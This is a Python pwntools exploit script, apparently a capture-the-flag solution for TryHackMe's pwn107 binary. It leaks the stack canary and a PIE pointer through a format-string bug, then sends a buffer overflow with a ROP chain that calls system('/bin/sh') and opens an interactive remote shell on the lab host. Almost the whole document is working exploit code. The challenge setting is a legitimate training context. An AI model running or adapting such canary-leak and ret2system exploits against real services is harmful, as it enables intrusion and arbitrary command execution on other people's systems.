
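#!/usr/bin/python3
"""pwn107 (TryHackMe pwn101): format-string leak + ret2system ROP chain.

Two round-trips with the service:
  1. answer the first "? " prompt with a format string that leaks the
     stack canary (%13$p) and a PIE code pointer (%19$p);
  2. answer the second prompt with a stack-smashing payload that replays
     the canary and returns into system("/bin/sh").

The %N$p indices, the 0x992 distance from the leaked pointer to the PIE
base and the pop-rdi gadget offset are specific to this pwn107 build;
re-derive them if the binary changes.  The leaks are sanity-checked
before the payload is built so a wrong offset fails loudly instead of
silently crashing the remote process.
"""
from pwn import *

context.binary = target = ELF("./pwn107", checksec=False)

# `python3 a.py LOCAL` runs ./pwn107 locally; the default is the THM box.
if args.LOCAL:
    r = process()
else:
    r = remote("10.10.74.244", 9007)

# helpers
s = lambda a: r.sendafter(b"? ", a)   # reply to the next "? " prompt
ss = lambda a: r.send(a)              # raw send, no prompt wait

# --- stage 1: leak canary and a PIE pointer through the format-string bug ---
s(b"%13$p.%19$p")
r.recvuntil(b": ")
leaks = r.recvlineS().strip().split(".")
if len(leaks) < 2:
    # log.error raises PwnlibException, so nothing below runs on bad input.
    log.error("unexpected leak line, expected two '.'-separated values: %r", leaks)

canary = int(leaks[0], 16)
# An x86-64 glibc stack canary always has a zero low byte; anything else
# means %13$p is not the canary slot for this build.
if canary & 0xff != 0:
    log.error("bad canary %#x (low byte must be 0) - wrong format-string index?", canary)
log.info("canary: %#x", canary)

# Only the first 14 chars ("0x" + 12 hex digits) are the pointer;
# presumably the line continues after the second %p - verify on a
# different build before relying on the slice.
target.address = int(leaks[1][:14], 16) - 0x992
# The PIE base must be page-aligned; if not, 0x992 is not the right
# offset for the leaked pointer.
if target.address & 0xfff != 0:
    log.error("PIE base %#x is not page-aligned - wrong leak offset?", target.address)
log.info("pie: %#x", target.address)

system = target.sym.system                 # system stub inside the binary
sh = next(target.search(b"/bin/sh\0"))     # raises StopIteration if absent

# --- gadgets (offsets relative to the PIE base) ---
pop_rdi = target.address + 0x0af3          # pop rdi ; ret
ret = pop_rdi + 1                          # the `ret` right after the 1-byte pop

# --- stage 2: overflow the buffer, keep the canary, return into system ---
buf = b"A" * 24           # fill the buffer up to the canary slot
buf += p64(canary)        # canary must be replayed exactly or __stack_chk_fail aborts
buf += b"A" * 8           # saved rbp, value irrelevant
buf += p64(pop_rdi)       # return address -> pop rdi ; ret
buf += p64(sh)            #   rdi = "/bin/sh"
buf += p64(ret)           # extra ret keeps rsp 16-byte aligned when entering system
buf += p64(system)        # system("/bin/sh")
ss(buf)
r.interactive()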